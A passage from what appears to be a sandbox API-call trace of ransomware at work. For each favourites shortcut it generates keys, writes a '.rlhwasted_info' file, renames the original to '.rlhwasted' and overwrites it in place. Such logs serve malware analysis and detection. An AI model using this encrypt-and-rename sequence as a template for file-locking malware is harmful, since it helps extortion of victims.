(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0192.914] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ac) returned 0x70cfe8 [0192.915] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.915] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fd458 [0192.915] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0192.916] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fd458 | out: pbBuffer=0x6fd458) returned 1 [0192.916] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0192.918] WriteFile (in: hFile=0x124, lpBuffer=0x6fd458*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fd458*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0192.921] SetEndOfFile (hFile=0x124) returned 1 [0192.921] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.921] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0192.921] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.rlhwasted")) returned 1 [0192.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0192.936] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0192.937] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0192.937] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0192.937] CloseHandle (hObject=0x110) returned 1 [0192.940] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0192.973] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0192.973] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.973] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0192.974] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0192.974] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.985] SetEndOfFile (hFile=0x124) returned 1 [0192.988] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0192.988] CloseHandle (hObject=0x124) returned 1 [0192.993] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0192.993] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x700568 | out: hHeap=0x6b0000) returned 1 [0192.993] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0192.995] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0192.995] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.995] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0192.995] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c0) returned 0x6ee458 [0192.995] lstrcpyW (in: lpString1=0x6ee50e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.995] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fd458 [0192.995] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0192.996] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fd458 | out: pbBuffer=0x6fd458) returned 1 [0192.996] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0192.997] WriteFile (in: hFile=0x124, lpBuffer=0x6fd458*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fd458*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0193.002] SetEndOfFile (hFile=0x124) returned 1 [0193.002] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.003] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0193.003] lstrcpyW (in: lpString1=0x6ee50e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0193.003] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.rlhwasted")) returned 1 [0193.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0193.004] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0193.004] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0193.004] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0193.004] CloseHandle (hObject=0x110) returned 1 [0193.007] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0193.008] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0193.008] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.008] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0193.009] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0193.009] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.018] SetEndOfFile (hFile=0x124) returned 1 [0193.021] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0193.021] CloseHandle (hObject=0x124) returned 1 [0193.023] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0193.023] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed820 | out: hHeap=0x6b0000) returned 1 [0193.024] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0193.024] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0193.025] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0193.025] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b2) returned 0x6ee458 [0193.025] lstrcpyW (in: lpString1=0x6ee500, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0193.025] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fd458 [0193.025] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0193.026] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6fd458 | out: pbBuffer=0x6fd458) returned 1 [0193.026] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0193.026] WriteFile (in: hFile=0x124, lpBuffer=0x6fd458*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fd458*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0193.027] SetEndOfFile (hFile=0x124) returned 1 [0193.028] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.028] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0193.028] lstrcpyW (in: lpString1=0x6ee500, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0193.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.rlhwasted")) returned 1 [0193.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0193.029] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0193.029] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0193.029] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0193.030] CloseHandle (hObject=0x104) returned 1 [0193.037] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0193.038] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0193.038] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.038] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0193.039] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0193.039] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.074] SetEndOfFile (hFile=0x124) [0193.074] SetEndOfFile (hFile=0x124) returned 1 [0193.076] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0193.076] CloseHandle (hObject=0x124) returned 1 [0193.081] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0193.081] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edf98 | out: hHeap=0x6b0000) returned 1 [0193.081] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0193.082] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0193.082] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0193.082] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b2) returned 0x6ee458 [0193.082] lstrcpyW (in: lpString1=0x6ee500, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0193.082] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0193.082] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0193.083] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0193.083] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0193.101] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0193.103] SetEndOfFile (hFile=0x124) returned 1 [0193.103] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.103] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0193.103] lstrcpyW (in: lpString1=0x6ee500, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0193.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.rlhwasted")) returned 1 [0193.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0193.109] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0193.109] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0193.109] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0193.109] CloseHandle (hObject=0x104) returned 1 [0193.113] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0193.114] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0193.114] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.114] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0193.115] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0193.115] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.157] SetEndOfFile (hFile=0x124) returned 1 [0193.160] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0193.160] CloseHandle (hObject=0x124) returned 1 [0193.162] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0193.162] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee0a0 | out: hHeap=0x6b0000) returned 1 [0193.162] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0193.163] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0193.164] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0193.164] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a6) returned 0x6ee458 [0193.164] lstrcpyW (in: lpString1=0x6ee4f4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0193.164] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fd458 [0193.164] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0193.165] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fd458 | out: pbBuffer=0x6fd458) returned 1 [0193.165] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0193.165] WriteFile (in: hFile=0x124, lpBuffer=0x6fd458*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fd458*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0193.168] SetEndOfFile (hFile=0x124) returned 1 [0193.168] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.168] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0193.168] lstrcpyW (in: lpString1=0x6ee4f4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0193.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.rlhwasted")) returned 1 [0193.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0193.789] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0193.789] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0193.789] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0193.789] CloseHandle (hObject=0x110) returned 1 [0193.795] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0193.796] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0193.796] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.796] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0193.797] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0193.797] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.806] SetEndOfFile (hFile=0x124) returned 1 [0193.809] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0193.809] CloseHandle (hObject=0x124) returned 1 [0193.811] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0193.811] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fe440 | out: hHeap=0x6b0000) returned 1 [0193.811] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0193.812] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0193.812] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.812] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0193.812] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x296) returned 0x6ee458 [0193.812] lstrcpyW (in: lpString1=0x6ee4e4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0193.812] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0193.812] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0193.813] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0193.813] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.rlhwasted_info" (normalized: 